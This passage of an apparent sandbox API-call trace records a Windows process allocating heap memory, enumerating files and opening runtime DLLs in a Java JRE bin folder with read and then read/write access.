hHeap=0x20000) returned 1 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.470] AreFileApisANSI () returned 1 [0093.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0093.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x45ef8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 52 [0093.470] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa12a0)) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0093.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.470] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0093.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0093.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.471] AreFileApisANSI () returned 1 [0093.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll", lpUsedDefaultChar=0x0) returned 52 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0093.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.471] AreFileApisANSI () returned 1 [0093.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0093.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 52 [0093.472] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.472] GetFileType (hFile=0x360) returned 0x1 [0093.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0093.472] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.472] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.472] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.472] CloseHandle (hObject=0x360) returned 1 [0093.473] AreFileApisANSI () returned 1 [0093.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0093.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45e18, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 52 [0093.473] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.473] GetFileType (hFile=0x360) returned 0x1 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0093.473] CloseHandle (hObject=0x360) returned 1 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.474] AreFileApisANSI () returned 1 [0093.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0093.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 52 [0093.474] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750)) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0093.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.474] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0093.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.475] AreFileApisANSI () returned 1 [0093.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll", lpUsedDefaultChar=0x0) returned 52 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0093.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.476] AreFileApisANSI () returned 1 [0093.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0093.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 52 [0093.476] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.476] GetFileType (hFile=0x360) returned 0x1 [0093.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0093.476] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.476] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.476] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.476] CloseHandle (hObject=0x360) returned 1 [0093.477] AreFileApisANSI () returned 1 [0093.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0093.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 52 [0093.477] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.477] GetFileType (hFile=0x360) returned 0x1 [0093.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0093.477] CloseHandle (hObject=0x360) returned 1 [0093.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 